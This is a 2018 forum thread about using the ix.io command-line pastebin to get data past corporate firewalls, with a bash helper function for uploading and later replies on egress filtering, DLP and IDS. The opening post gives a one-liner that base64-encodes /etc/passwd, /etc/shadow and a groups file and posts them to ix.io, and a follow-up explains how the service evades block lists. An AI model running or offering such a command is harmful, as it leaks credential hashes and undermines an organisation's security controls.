Command Line pastebin

denzuko · October 9, 2018, 4:21pm

Ever need to dump something to the web quickly but that evil corp’s firewall is in the way?

We’ll ix.io is here to help.

It’s just as simple as:

cat /etc/passwd /etc/groups /etc/shadow | base64 | curl -F 'f:1=<-' https://ix.io

Helper script

Paste the following function into ~/.bashrc:

        ix() {
            local opts
            local OPTIND
            [ -f "$HOME/.netrc" ] && opts='-n'
            while getopts ":hd:i:n:" x; do
                case $x in
                    h) echo "ix [-d ID] [-i ID] [-n N] [opts]"; return;;
                    d) $echo curl $opts -X DELETE ix.io/$OPTARG; return;;
                    i) opts="$opts -X PUT"; local id="$OPTARG";;
                    n) opts="$opts -F read:1=$OPTARG";;
                esac
            done
            shift $(($OPTIND - 1))
            [ -t 0 ] && {
                local filename="$1"; shift
                [ "$filename" ] && {
                    curl $opts -F f:1=@"$filename" $* ix.io/$id
                    return
                }
                echo "^C to cancel, ^D to send."
            }
            curl $opts -F f:1='<-' $* ix.io/$id
        }

Then open a new shell and type ix -h

deetoo · October 9, 2018, 8:11pm

If that evil corp’s firewall is in the way, then using curl to post data to a web address is going to fail too.

denzuko · October 12, 2018, 4:17pm

Depends on the firewall and mainly the infosec team. But most just use a transparent proxy for outbound 80/tcp and 443/tls which just blocks based on sites one is visiting via some combo of greylists, whitelists, blacklists, and iblocklist.

ix.io is one of a few that’s not on that block list because googlebot does not know what to do with it.

Which by the way since the source exists as serverless function script. One can deploy a new site in seconds under as many domains and ips they like.

hon1nbo · October 12, 2018, 5:55pm

with the exception of whitelisting known traffic, egress control is basically a losing game. Some corps actually have a good handle on knowing what their traffic looks like, and can pull off said whitelisting. However it’s far from the norm.

denzuko · October 12, 2018, 9:01pm

Isn’t the average to filter more on keywords out of preventing leaks to social network sites or other “office productivity” based policies?

hon1nbo · October 13, 2018, 2:02am

no, the filters a service like these alternatives to pastebin operates for are different than productivity filters. Productivity filters are somewhat going out as most users use social media from their phones anyway, and they cause a lot of operation problems for the benefits achieved.

The systems that inspect traffic for security purposes operate under a category of tools known as Data Loss Prevention (DLP) as well as various forms of IDS systems meant to detect malicious traffic. The goal is to prevent the exfiltration, both intentional and unintentional, of protected data.